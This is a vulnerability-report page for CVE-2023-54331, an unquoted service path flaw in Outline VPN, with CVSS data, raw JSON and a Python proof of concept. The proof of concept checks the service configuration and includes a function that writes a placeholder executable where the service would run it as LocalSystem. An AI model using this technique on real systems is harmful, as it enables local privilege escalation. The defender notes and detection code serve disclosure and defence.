Security Vulnerability Report
CVE-2023-54331 CVSS 7.8 HIGH

CVE-2023-54331

Published: 2026-01-13 23:16:00
Last Modified: 2026-02-02 16:16:18

Description

Outline 1.6.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the OutlineService executable to inject malicious code that will be executed with LocalSystem permissions.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:getoutline:outline:-:*:*:*:*:*:*:* - VULNERABLE
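Outline VPN < 1.6.0 (note: the description above names 1.6.0 itself as affected, and the CPE entry uses "-" for the version, so it carries no version range; confirm the affected and fixed versions against the vendor advisory before relying on this line)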

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
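# CVE-2023-54331 PoC - Outline Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in Outline VPN
# Author: Security Researcher
# Target: Outline VPN <= 1.6.0
#
# Defender notes (CWE-428, unquoted search path):
#   * Root cause: the service's command line is registered without surrounding
#     quotes although the executable path contains a space, so Windows has to
#     guess where the executable name ends.
#   * Mitigation: update the product, make sure the service's ImagePath is
#     wrapped in double quotes, and verify that standard users cannot create
#     files in any directory along that path.
#   * Detection: audit service configurations for unquoted paths with spaces
#     (what check_vulnerable() does for one service) and alert on executables
#     that appear in directories where the product does not install them.
import os
import subprocess
import time


def binary_path_is_unquoted(path):
    """Return True if a service command line has an unquoted path with a space.

    Args:
        path: The BINARY_PATH_NAME value as reported by ``sc qc``; it may carry
            arguments after the executable.

    Returns:
        False for an empty value or one that begins with a double quote.
        Otherwise True when the executable portion contains a space.
    """
    candidate = path.strip()
    # A leading quote means the executable path is delimited explicitly, even
    # when arguments follow the closing quote.
    if not candidate or candidate.startswith('"'):
        return False
    # Heuristic: treat everything up to the first ".exe" as the executable so
    # that spaces in trailing arguments do not count as a finding. A directory
    # name that itself contains ".exe" would defeat this; verify such hits by hand.
    exe_end = candidate.lower().find('.exe')
    if exe_end != -1:
        candidate = candidate[:exe_end + len('.exe')]
    return ' ' in candidate


def check_vulnerable():
    """Check if OutlineService has unquoted path vulnerability.

    Runs ``sc qc OutlineService`` and inspects each BINARY_PATH_NAME line.

    Returns:
        ``(True, path)`` for the first BINARY_PATH_NAME value that
        binary_path_is_unquoted() flags, otherwise ``(False, None)``. A failure
        to run ``sc`` is printed and also reported as ``(False, None)``.
    """
    try:
        result = subprocess.run(
            ['sc', 'qc', 'OutlineService'],
            capture_output=True,
            text=True,
        )
    except (OSError, ValueError, subprocess.SubprocessError) as e:
        # `sc` is missing (non-Windows host), could not be started, or its
        # output could not be decoded.
        print(f"Error checking vulnerability: {e}")
        return False, None

    for line in result.stdout.splitlines():
        if 'BINARY_PATH_NAME' not in line:
            continue
        # Split on the first colon only: the value itself contains the drive
        # letter's colon.
        _, sep, value = line.partition(':')
        path = value.strip()
        if sep and binary_path_is_unquoted(path):
            return True, path
    return False, None


def create_malicious_executable():
    """Return the placeholder bytes this PoC writes to disk.

    The result is the two-byte ``MZ`` magic followed by 100 zero bytes. It
    carries no payload and is not a runnable program.
    """
    # For demonstration purposes only - do not use for malicious purposes
    malicious_code = b'MZ' + b'\x00' * 100
    return malicious_code


def exploit_unquoted_path(target_dir):
    """Write the placeholder bytes to a path derived from ``target_dir``.

    Args:
        target_dir: A backslash-separated Windows path.

    Returns:
        True if the file was written. False if ``target_dir`` has fewer than
        two backslash-separated components or the write raised PermissionError.
    """
    path_parts = target_dir.split('\\')
    if len(path_parts) < 2:
        return False

    # The destination is built from the first two components of target_dir.
    exploit_path = os.path.join(path_parts[0], path_parts[1] + 'OutlineService.exe')
    try:
        with open(exploit_path, 'wb') as f:
            f.write(create_malicious_executable())
    except PermissionError:
        # Expected outcome on a host whose directory ACLs deny this write to
        # the current user; that ACL is the control defenders should verify.
        print("[-] Permission denied - need elevated privileges")
        return False

    print(f"[+] Malicious executable created at: {exploit_path}")
    print("[+] Waiting for service restart...")
    print("[+] When OutlineService restarts, it will execute our payload with LocalSystem privileges")
    return True


def main():
    """Report whether OutlineService is registered with an unquoted path.

    Only prints findings; it does not call exploit_unquoted_path().
    """
    print("=" * 60)
    print("CVE-2023-54331 - Outline VPN Unquoted Service Path Exploit")
    print("=" * 60)

    vulnerable, service_path = check_vulnerable()
    if not vulnerable:
        print("[-] Service not found or not vulnerable")
        return

    print("[+] Vulnerability confirmed!")
    print(f"[+] Service path: {service_path}")
    print("[+] System is vulnerable to unquoted service path attack")

    # Take the first whitespace-delimited token of the reported path and print
    # its directory part.
    path_parts = service_path.replace('"', '').strip().split()
    if path_parts:
        target_dir = path_parts[0]
        print(f"[~] Target directory for exploitation: {os.path.dirname(target_dir)}")


if __name__ == "__main__":
    main()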

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-54331", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:00.333", "lastModified": "2026-02-02T16:16:17.677", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Outline 1.6.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the OutlineService executable to inject malicious code that will be executed with LocalSystem permissions."}, {"lang": "es", "value": "Outline 1.6.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio sin comillas en el ejecutable OutlineService para inyectar código malicioso que se ejecutará con permisos de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getoutline:outline:-:*:*:*:*:*:*:*", "matchCriteriaId": "B6E4B567-51AE-412C-A250-E356746834DF"}]}]}], "references": [{"url": "https://getoutline.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51128", "source": "[email protected]", "tags": ["Exploit", 
"Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/outline-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}